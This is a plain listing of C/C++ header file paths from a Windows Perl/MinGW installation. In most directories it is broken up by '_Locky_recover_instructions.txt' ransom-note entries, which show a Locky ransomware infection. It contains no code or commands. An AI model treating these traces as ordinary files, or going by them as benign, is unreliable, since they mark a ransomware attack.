c:\Perl\c\i686-w64-mingw32\include\zmouse.h<br />
c:\Perl\c\i686-w64-mingw32\include\_dbdao.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw_dxhelper.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw_float.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw_mac.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw_print_pop.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw_print_push.h<br />
c:\Perl\c\i686-w64-mingw32\include\_mingw_stdarg.h<br />
c:\Perl\c\include\c++\4.4.3\backward\auto_ptr.h<br />
c:\Perl\c\include\c++\4.4.3\backward\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\backward\backward_warning.h<br />
c:\Perl\c\include\c++\4.4.3\backward\binders.h<br />
c:\Perl\c\include\c++\4.4.3\backward\hashtable.h<br />
c:\Perl\c\include\c++\4.4.3\backward\hash_fun.h<br />
c:\Perl\c\include\c++\4.4.3\bits\algorithmfwd.h<br />
c:\Perl\c\include\c++\4.4.3\bits\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\bits\allocator.h<br />
c:\Perl\c\include\c++\4.4.3\bits\atomicfwd_c.h<br />
c:\Perl\c\include\c++\4.4.3\bits\atomicfwd_cxx.h<br />
c:\Perl\c\include\c++\4.4.3\bits\atomic_0.h<br />
c:\Perl\c\include\c++\4.4.3\bits\atomic_2.h<br />
c:\Perl\c\include\c++\4.4.3\bits\basic_ios.h<br />
c:\Perl\c\include\c++\4.4.3\bits\basic_string.h<br />
c:\Perl\c\include\c++\4.4.3\bits\boost_concept_check.h<br />
c:\Perl\c\include\c++\4.4.3\bits\char_traits.h<br />
c:\Perl\c\include\c++\4.4.3\bits\codecvt.h<br />
c:\Perl\c\include\c++\4.4.3\bits\concept_check.h<br />
c:\Perl\c\include\c++\4.4.3\bits\cpp_type_traits.h<br />
c:\Perl\c\include\c++\4.4.3\bits\forward_list.h<br />
c:\Perl\c\include\c++\4.4.3\bits\functexcept.h<br />
c:\Perl\c\include\c++\4.4.3\bits\functional_hash.h<br />
c:\Perl\c\include\c++\4.4.3\bits\gslice.h<br />
c:\Perl\c\include\c++\4.4.3\bits\gslice_array.h<br />
c:\Perl\c\include\c++\4.4.3\bits\hashtable.h<br />
c:\Perl\c\include\c++\4.4.3\bits\indirect_array.h<br />
c:\Perl\c\include\c++\4.4.3\bits\ios_base.h<br />
c:\Perl\c\include\c++\4.4.3\bits\localefwd.h<br />
c:\Perl\c\include\c++\4.4.3\bits\locale_classes.h<br />
c:\Perl\c\include\c++\4.4.3\bits\locale_facets.h<br />
c:\Perl\c\include\c++\4.4.3\bits\locale_facets_nonio.h<br />
c:\Perl\c\include\c++\4.4.3\bits\mask_array.h<br />
c:\Perl\c\include\c++\4.4.3\bits\move.h<br />
c:\Perl\c\include\c++\4.4.3\bits\ostream_insert.h<br />
c:\Perl\c\include\c++\4.4.3\bits\postypes.h<br />
c:\Perl\c\include\c++\4.4.3\bits\shared_ptr.h<br />
c:\Perl\c\include\c++\4.4.3\bits\slice_array.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_algo.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_algobase.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_bvector.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_construct.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_deque.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_function.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_heap.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_iterator.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_iterator_base_funcs.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_iterator_base_types.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_list.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_map.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_multimap.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_multiset.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_numeric.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_pair.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_queue.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_raw_storage_iter.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_relops.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_set.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_stack.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_tempbuf.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_tree.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_uninitialized.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stl_vector.h<br />
c:\Perl\c\include\c++\4.4.3\bits\streambuf_iterator.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stream_iterator.h<br />
c:\Perl\c\include\c++\4.4.3\bits\stringfwd.h<br />
c:\Perl\c\include\c++\4.4.3\bits\unique_ptr.h<br />
c:\Perl\c\include\c++\4.4.3\bits\valarray_after.h<br />
c:\Perl\c\include\c++\4.4.3\bits\valarray_array.h<br />
c:\Perl\c\include\c++\4.4.3\bits\valarray_before.h<br />
c:\Perl\c\include\c++\4.4.3\c++0x_warning.h<br />
c:\Perl\c\include\c++\4.4.3\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\complex.h<br />
c:\Perl\c\include\c++\4.4.3\cxxabi-forced.h<br />
c:\Perl\c\include\c++\4.4.3\cxxabi.h<br />
c:\Perl\c\include\c++\4.4.3\debug\debug.h<br />
c:\Perl\c\include\c++\4.4.3\debug\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\debug\formatter.h<br />
c:\Perl\c\include\c++\4.4.3\debug\functions.h<br />
c:\Perl\c\include\c++\4.4.3\debug\macros.h<br />
c:\Perl\c\include\c++\4.4.3\debug\map.h<br />
c:\Perl\c\include\c++\4.4.3\debug\multimap.h<br />
c:\Perl\c\include\c++\4.4.3\debug\multiset.h<br />
c:\Perl\c\include\c++\4.4.3\debug\safe_base.h<br />
c:\Perl\c\include\c++\4.4.3\debug\safe_iterator.h<br />
c:\Perl\c\include\c++\4.4.3\debug\safe_sequence.h<br />
c:\Perl\c\include\c++\4.4.3\debug\set.h<br />
c:\Perl\c\include\c++\4.4.3\exception_defines.h<br />
c:\Perl\c\include\c++\4.4.3\exception_ptr.h<br />
c:\Perl\c\include\c++\4.4.3\ext\array_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\ext\atomicity.h<br />
c:\Perl\c\include\c++\4.4.3\ext\bitmap_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\cast.h<br />
c:\Perl\c\include\c++\4.4.3\ext\codecvt_specializations.h<br />
c:\Perl\c\include\c++\4.4.3\ext\concurrence.h<br />
c:\Perl\c\include\c++\4.4.3\ext\debug_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\enc_filebuf.h<br />
c:\Perl\c\include\c++\4.4.3\ext\extptr_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\malloc_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\mt_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\new_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\numeric_traits.h<br />
c:\Perl\c\include\c++\4.4.3\ext\pod_char_traits.h<br />
c:\Perl\c\include\c++\4.4.3\ext\pointer.h<br />
c:\Perl\c\include\c++\4.4.3\ext\pool_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\rc_string_base.h<br />
c:\Perl\c\include\c++\4.4.3\ext\ropeimpl.h<br />
c:\Perl\c\include\c++\4.4.3\ext\sso_string_base.h<br />
c:\Perl\c\include\c++\4.4.3\ext\stdio_filebuf.h<br />
c:\Perl\c\include\c++\4.4.3\ext\stdio_sync_filebuf.h<br />
c:\Perl\c\include\c++\4.4.3\ext\string_conversions.h<br />
c:\Perl\c\include\c++\4.4.3\ext\throw_allocator.h<br />
c:\Perl\c\include\c++\4.4.3\ext\typelist.h<br />
c:\Perl\c\include\c++\4.4.3\ext\type_traits.h<br />
c:\Perl\c\include\c++\4.4.3\ext\vstring.h<br />
c:\Perl\c\include\c++\4.4.3\ext\vstring_fwd.h<br />
c:\Perl\c\include\c++\4.4.3\ext\vstring_util.h<br />
c:\Perl\c\include\c++\4.4.3\fenv.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\atomic_word.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\basic_file.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\c++allocator.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\c++config.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\c++io.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\c++locale.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\cpu_defines.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\ctype_base.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\ctype_inline.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\ctype_noninline.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\cxxabi_tweaks.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\error_constants.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\extc++.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\gthr-default.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\gthr-posix.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\gthr-single.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\gthr-tpf.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\gthr.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\messages_members.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\os_defines.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\stdc++.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\stdtr1c++.h<br />
c:\Perl\c\include\c++\4.4.3\i686-w64-mingw32\bits\time_members.h<br />
c:\Perl\c\include\c++\4.4.3\stdatomic.h<br />
c:\Perl\c\include\c++\4.4.3\tgmath.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\complex.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\tr1\ctype.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\fenv.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\float.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\functional_hash.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\hashtable.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\inttypes.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\limits.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\math.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\shared_ptr.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\special_function_util.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\stdarg.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\stdbool.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\stdint.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\stdio.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\stdlib.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\tgmath.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\wchar.h<br />
c:\Perl\c\include\c++\4.4.3\tr1\wctype.h<br />
c:\Perl\c\include\c++\4.4.3\tr1_impl\boost_sp_counted_base.h<br />
c:\Perl\c\include\c++\4.4.3\tr1_impl\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\c++\4.4.3\tr1_impl\functional_hash.h<br />
c:\Perl\c\include\c++\4.4.3\tr1_impl\hashtable_policy.h<br />
c:\Perl\c\include\db.h<br />
c:\Perl\c\include\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\dbm.h<br />
c:\Perl\c\include\db_cxx.h<br />
c:\Perl\c\include\entities.h<br />
c:\Perl\c\include\expat.h<br />
c:\Perl\c\include\expat_external.h<br />
c:\Perl\c\include\freetype2\freetype\config\ftconfig.h<br />
c:\Perl\c\include\freetype2\freetype\config\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\freetype2\freetype\config\ftheader.h<br />
c:\Perl\c\include\freetype2\freetype\config\ftmodule.h<br />
c:\Perl\c\include\freetype2\freetype\config\ftoption.h<br />
c:\Perl\c\include\freetype2\freetype\config\ftstdlib.h<br />
c:\Perl\c\include\freetype2\freetype\freetype.h<br />
c:\Perl\c\include\freetype2\freetype\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\freetype2\freetype\ftadvanc.h<br />
c:\Perl\c\include\freetype2\freetype\ftbbox.h<br />
c:\Perl\c\include\freetype2\freetype\ftbdf.h<br />
c:\Perl\c\include\freetype2\freetype\ftbitmap.h<br />
c:\Perl\c\include\freetype2\freetype\ftcache.h<br />
c:\Perl\c\include\freetype2\freetype\ftchapters.h<br />
c:\Perl\c\include\freetype2\freetype\ftcid.h<br />
c:\Perl\c\include\freetype2\freetype\fterrdef.h<br />
c:\Perl\c\include\freetype2\freetype\fterrors.h<br />
c:\Perl\c\include\freetype2\freetype\ftgasp.h<br />
c:\Perl\c\include\freetype2\freetype\ftglyph.h<br />
c:\Perl\c\include\freetype2\freetype\ftgxval.h<br />
c:\Perl\c\include\freetype2\freetype\ftgzip.h<br />
c:\Perl\c\include\freetype2\freetype\ftimage.h<br />
c:\Perl\c\include\freetype2\freetype\ftincrem.h<br />
c:\Perl\c\include\freetype2\freetype\ftlcdfil.h<br />
c:\Perl\c\include\freetype2\freetype\ftlist.h<br />
c:\Perl\c\include\freetype2\freetype\ftlzw.h<br />
c:\Perl\c\include\freetype2\freetype\ftmac.h<br />
c:\Perl\c\include\freetype2\freetype\ftmm.h<br />
c:\Perl\c\include\freetype2\freetype\ftmodapi.h<br />
c:\Perl\c\include\freetype2\freetype\ftmoderr.h<br />
c:\Perl\c\include\freetype2\freetype\ftotval.h<br />
c:\Perl\c\include\freetype2\freetype\ftoutln.h<br />
c:\Perl\c\include\freetype2\freetype\ftpfr.h<br />
c:\Perl\c\include\freetype2\freetype\ftrender.h<br />
c:\Perl\c\include\freetype2\freetype\ftsizes.h<br />
c:\Perl\c\include\freetype2\freetype\ftsnames.h<br />
c:\Perl\c\include\freetype2\freetype\ftstroke.h<br />
c:\Perl\c\include\freetype2\freetype\ftsynth.h<br />
c:\Perl\c\include\freetype2\freetype\ftsystem.h<br />
c:\Perl\c\include\freetype2\freetype\fttrigon.h<br />
c:\Perl\c\include\freetype2\freetype\fttypes.h<br />
c:\Perl\c\include\freetype2\freetype\ftwinfnt.h<br />
c:\Perl\c\include\freetype2\freetype\ftxf86.h<br />
c:\Perl\c\include\freetype2\freetype\t1tables.h<br />
c:\Perl\c\include\freetype2\freetype\ttnameid.h<br />
c:\Perl\c\include\freetype2\freetype\tttables.h<br />
c:\Perl\c\include\freetype2\freetype\tttags.h<br />
c:\Perl\c\include\freetype2\freetype\ttunpat.h<br />
c:\Perl\c\include\ft2build.h<br />
c:\Perl\c\include\gd.h<br />
c:\Perl\c\include\gdbm.h<br />
c:\Perl\c\include\gdcache.h<br />
c:\Perl\c\include\gdfontg.h<br />
c:\Perl\c\include\gdfontl.h<br />
c:\Perl\c\include\gdfontmb.h<br />
c:\Perl\c\include\gdfonts.h<br />
c:\Perl\c\include\gdfontt.h<br />
c:\Perl\c\include\gdfx.h<br />
c:\Perl\c\include\gd_io.h<br />
c:\Perl\c\include\gif_lib.h<br />
c:\Perl\c\include\GL\freeglut.h<br />
c:\Perl\c\include\GL\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\GL\freeglut_ext.h<br />
c:\Perl\c\include\GL\freeglut_std.h<br />
c:\Perl\c\include\GL\glut.h<br />
c:\Perl\c\include\gmp.h<br />
c:\Perl\c\include\iconv.h<br />
c:\Perl\c\include\jconfig.h<br />
c:\Perl\c\include\jerror.h<br />
c:\Perl\c\include\jmorecfg.h<br />
c:\Perl\c\include\jpeglib.h<br />
c:\Perl\c\include\libcharset.h<br />
c:\Perl\c\include\libexslt\exslt.h<br />
c:\Perl\c\include\libexslt\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\libexslt\exsltconfig.h<br />
c:\Perl\c\include\libexslt\exsltexports.h<br />
c:\Perl\c\include\libpng12\png.h<br />
c:\Perl\c\include\libpng12\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\libpng12\pngconf.h<br />
c:\Perl\c\include\libpq-events.h<br />
c:\Perl\c\include\libpq-fe.h<br />
c:\Perl\c\include\libssh2.h<br />
c:\Perl\c\include\libssh2_publickey.h<br />
c:\Perl\c\include\libssh2_sftp.h<br />
c:\Perl\c\include\libxml\c14n.h<br />
c:\Perl\c\include\libxml\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\libxml\catalog.h<br />
c:\Perl\c\include\libxml\chvalid.h<br />
c:\Perl\c\include\libxml\debugXML.h<br />
c:\Perl\c\include\libxml\dict.h<br />
c:\Perl\c\include\libxml\DOCBparser.h<br />
c:\Perl\c\include\libxml\encoding.h<br />
c:\Perl\c\include\libxml\entities.h<br />
c:\Perl\c\include\libxml\globals.h<br />
c:\Perl\c\include\libxml\hash.h<br />
c:\Perl\c\include\libxml\HTMLparser.h<br />
c:\Perl\c\include\libxml\HTMLtree.h<br />
c:\Perl\c\include\libxml\list.h<br />
c:\Perl\c\include\libxml\nanoftp.h<br />
c:\Perl\c\include\libxml\nanohttp.h<br />
c:\Perl\c\include\libxml\parser.h<br />
c:\Perl\c\include\libxml\parserInternals.h<br />
c:\Perl\c\include\libxml\pattern.h<br />
c:\Perl\c\include\libxml\relaxng.h<br />
c:\Perl\c\include\libxml\SAX.h<br />
c:\Perl\c\include\libxml\SAX2.h<br />
c:\Perl\c\include\libxml\schemasInternals.h<br />
c:\Perl\c\include\libxml\schematron.h<br />
c:\Perl\c\include\libxml\threads.h<br />
c:\Perl\c\include\libxml\tree.h<br />
c:\Perl\c\include\libxml\uri.h<br />
c:\Perl\c\include\libxml\valid.h<br />
c:\Perl\c\include\libxml\xinclude.h<br />
c:\Perl\c\include\libxml\xlink.h<br />
c:\Perl\c\include\libxml\xmlautomata.h<br />
c:\Perl\c\include\libxml\xmlerror.h<br />
c:\Perl\c\include\libxml\xmlexports.h<br />
c:\Perl\c\include\libxml\xmlIO.h<br />
c:\Perl\c\include\libxml\xmlmemory.h<br />
c:\Perl\c\include\libxml\xmlmodule.h<br />
c:\Perl\c\include\libxml\xmlreader.h<br />
c:\Perl\c\include\libxml\xmlregexp.h<br />
c:\Perl\c\include\libxml\xmlsave.h<br />
c:\Perl\c\include\libxml\xmlschemas.h<br />
c:\Perl\c\include\libxml\xmlschemastypes.h<br />
c:\Perl\c\include\libxml\xmlstring.h<br />
c:\Perl\c\include\libxml\xmlunicode.h<br />
c:\Perl\c\include\libxml\xmlversion.h<br />
c:\Perl\c\include\libxml\xmlwriter.h<br />
c:\Perl\c\include\libxml\xpath.h<br />
c:\Perl\c\include\libxml\xpathInternals.h<br />
c:\Perl\c\include\libxml\xpointer.h<br />
c:\Perl\c\include\libxslt\attributes.h<br />
c:\Perl\c\include\libxslt\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\libxslt\documents.h<br />
c:\Perl\c\include\libxslt\extensions.h<br />
c:\Perl\c\include\libxslt\extra.h<br />
c:\Perl\c\include\libxslt\functions.h<br />
c:\Perl\c\include\libxslt\imports.h<br />
c:\Perl\c\include\libxslt\keys.h<br />
c:\Perl\c\include\libxslt\namespaces.h<br />
c:\Perl\c\include\libxslt\numbersInternals.h<br />
c:\Perl\c\include\libxslt\pattern.h<br />
c:\Perl\c\include\libxslt\preproc.h<br />
c:\Perl\c\include\libxslt\security.h<br />
c:\Perl\c\include\libxslt\templates.h<br />
c:\Perl\c\include\libxslt\transform.h<br />
c:\Perl\c\include\libxslt\variables.h<br />
c:\Perl\c\include\libxslt\xslt.h<br />
c:\Perl\c\include\libxslt\xsltconfig.h<br />
c:\Perl\c\include\libxslt\xsltexports.h<br />
c:\Perl\c\include\libxslt\xsltInternals.h<br />
c:\Perl\c\include\libxslt\xsltlocale.h<br />
c:\Perl\c\include\libxslt\xsltutils.h<br />
c:\Perl\c\include\localcharset.h<br />
c:\Perl\c\include\lzma\base.h<br />
c:\Perl\c\include\lzma\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\lzma\bcj.h<br />
c:\Perl\c\include\lzma\block.h<br />
c:\Perl\c\include\lzma\check.h<br />
c:\Perl\c\include\lzma\container.h<br />
c:\Perl\c\include\lzma\delta.h<br />
c:\Perl\c\include\lzma\filter.h<br />
c:\Perl\c\include\lzma\index.h<br />
c:\Perl\c\include\lzma\index_hash.h<br />
c:\Perl\c\include\lzma\lzma.h<br />
c:\Perl\c\include\lzma\stream_flags.h<br />
c:\Perl\c\include\lzma\subblock.h<br />
c:\Perl\c\include\lzma\version.h<br />
c:\Perl\c\include\lzma\vli.h<br />
c:\Perl\c\include\lzma.h<br />
c:\Perl\c\include\mpc.h<br />
c:\Perl\c\include\mpf2mpfr.h<br />
c:\Perl\c\include\mpfr.h<br />
c:\Perl\c\include\mysql_5\config-win.h<br />
c:\Perl\c\include\mysql_5\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\mysql_5\decimal.h<br />
c:\Perl\c\include\mysql_5\errmsg.h<br />
c:\Perl\c\include\mysql_5\keycache.h<br />
c:\Perl\c\include\mysql_5\mysql\plugin.h<br />
c:\Perl\c\include\mysql_5\mysql\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\mysql_5\mysql.h<br />
c:\Perl\c\include\mysql_5\mysqld_ername.h<br />
c:\Perl\c\include\mysql_5\mysqld_error.h<br />
c:\Perl\c\include\mysql_5\mysql_com.h<br />
c:\Perl\c\include\mysql_5\mysql_embed.h<br />
c:\Perl\c\include\mysql_5\mysql_time.h<br />
c:\Perl\c\include\mysql_5\mysql_version.h<br />
c:\Perl\c\include\mysql_5\my_alloc.h<br />
c:\Perl\c\include\mysql_5\my_attribute.h<br />
c:\Perl\c\include\mysql_5\my_dbug.h<br />
c:\Perl\c\include\mysql_5\my_dir.h<br />
c:\Perl\c\include\mysql_5\my_getopt.h<br />
c:\Perl\c\include\mysql_5\my_global.h<br />
c:\Perl\c\include\mysql_5\my_list.h<br />
c:\Perl\c\include\mysql_5\my_net.h<br />
c:\Perl\c\include\mysql_5\my_no_pthread.h<br />
c:\Perl\c\include\mysql_5\my_pthread.h<br />
c:\Perl\c\include\mysql_5\my_sys.h<br />
c:\Perl\c\include\mysql_5\my_xml.h<br />
c:\Perl\c\include\mysql_5\m_ctype.h<br />
c:\Perl\c\include\mysql_5\m_string.h<br />
c:\Perl\c\include\mysql_5\sql_common.h<br />
c:\Perl\c\include\mysql_5\sql_state.h<br />
c:\Perl\c\include\mysql_5\sslopt-case.h<br />
c:\Perl\c\include\mysql_5\sslopt-longopts.h<br />
c:\Perl\c\include\mysql_5\sslopt-vars.h<br />
c:\Perl\c\include\mysql_5\typelib.h<br />
c:\Perl\c\include\ndbm.h<br />
c:\Perl\c\include\openssl\aes.h<br />
c:\Perl\c\include\openssl\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\openssl\asn1.h<br />
c:\Perl\c\include\openssl\asn1t.h<br />
c:\Perl\c\include\openssl\asn1_mac.h<br />
c:\Perl\c\include\openssl\bio.h<br />
c:\Perl\c\include\openssl\blowfish.h<br />
c:\Perl\c\include\openssl\bn.h<br />
c:\Perl\c\include\openssl\buffer.h<br />
c:\Perl\c\include\openssl\cast.h<br />
c:\Perl\c\include\openssl\comp.h<br />
c:\Perl\c\include\openssl\conf.h<br />
c:\Perl\c\include\openssl\conf_api.h<br />
c:\Perl\c\include\openssl\crypto.h<br />
c:\Perl\c\include\openssl\des.h<br />
c:\Perl\c\include\openssl\des_old.h<br />
c:\Perl\c\include\openssl\dh.h<br />
c:\Perl\c\include\openssl\dsa.h<br />
c:\Perl\c\include\openssl\dso.h<br />
c:\Perl\c\include\openssl\dtls1.h<br />
c:\Perl\c\include\openssl\ebcdic.h<br />
c:\Perl\c\include\openssl\ec.h<br />
c:\Perl\c\include\openssl\ecdh.h<br />
c:\Perl\c\include\openssl\ecdsa.h<br />
c:\Perl\c\include\openssl\engine.h<br />
c:\Perl\c\include\openssl\err.h<br />
c:\Perl\c\include\openssl\evp.h<br />
c:\Perl\c\include\openssl\e_os2.h<br />
c:\Perl\c\include\openssl\hmac.h<br />
c:\Perl\c\include\openssl\idea.h<br />
c:\Perl\c\include\openssl\krb5_asn.h<br />
c:\Perl\c\include\openssl\kssl.h<br />
c:\Perl\c\include\openssl\lhash.h<br />
c:\Perl\c\include\openssl\md2.h<br />
c:\Perl\c\include\openssl\md4.h<br />
c:\Perl\c\include\openssl\md5.h<br />
c:\Perl\c\include\openssl\objects.h<br />
c:\Perl\c\include\openssl\obj_mac.h<br />
c:\Perl\c\include\openssl\ocsp.h<br />
c:\Perl\c\include\openssl\opensslconf.h<br />
c:\Perl\c\include\openssl\opensslv.h<br />
c:\Perl\c\include\openssl\ossl_typ.h<br />
c:\Perl\c\include\openssl\pem.h<br />
c:\Perl\c\include\openssl\pem2.h<br />
c:\Perl\c\include\openssl\pkcs12.h<br />
c:\Perl\c\include\openssl\pkcs7.h<br />
c:\Perl\c\include\openssl\pqueue.h<br />
c:\Perl\c\include\openssl\pq_compat.h<br />
c:\Perl\c\include\openssl\rand.h<br />
c:\Perl\c\include\openssl\rc2.h<br />
c:\Perl\c\include\openssl\rc4.h<br />
c:\Perl\c\include\openssl\ripemd.h<br />
c:\Perl\c\include\openssl\rsa.h<br />
c:\Perl\c\include\openssl\safestack.h<br />
c:\Perl\c\include\openssl\sha.h<br />
c:\Perl\c\include\openssl\ssl.h<br />
c:\Perl\c\include\openssl\ssl2.h<br />
c:\Perl\c\include\openssl\ssl23.h<br />
c:\Perl\c\include\openssl\ssl3.h<br />
c:\Perl\c\include\openssl\stack.h<br />
c:\Perl\c\include\openssl\store.h<br />
c:\Perl\c\include\openssl\symhacks.h<br />
c:\Perl\c\include\openssl\tls1.h<br />
c:\Perl\c\include\openssl\tmdiff.h<br />
c:\Perl\c\include\openssl\txt_db.h<br />
c:\Perl\c\include\openssl\ui.h<br />
c:\Perl\c\include\openssl\ui_compat.h<br />
c:\Perl\c\include\openssl\x509.h<br />
c:\Perl\c\include\openssl\x509v3.h<br />
c:\Perl\c\include\openssl\x509_vfy.h<br />
c:\Perl\c\include\png.h<br />
c:\Perl\c\include\pngconf.h<br />
c:\Perl\c\include\postgres_ext.h<br />
c:\Perl\c\include\tiff.h<br />
c:\Perl\c\include\tiffconf.h<br />
c:\Perl\c\include\tiffio.h<br />
c:\Perl\c\include\tiffvers.h<br />
c:\Perl\c\include\X11\simx.h<br />
c:\Perl\c\include\X11\_Locky_recover_instructions.txt<br />
c:\Perl\c\include\X11\xpm.h<br />
c:\Perl\c\include\zconf.h<br />
c:\Perl\c\include\zlib.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ammintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\_Locky_recover_instructions.txt<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\avxintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\bmmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\cpuid.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\cross-stdarg.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\emmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\immintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\iso646.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\mm3dnow.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\mmintrin-common.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\mmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\mm_malloc.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\nmmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\pmmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\smmintrin.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp\ssp.h<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp\_Locky_recover_instructions.txt<br />
c:\Perl\c\lib\gcc\i686-w64-mingw32\4.4.3\include\ssp\stdio.h<br />
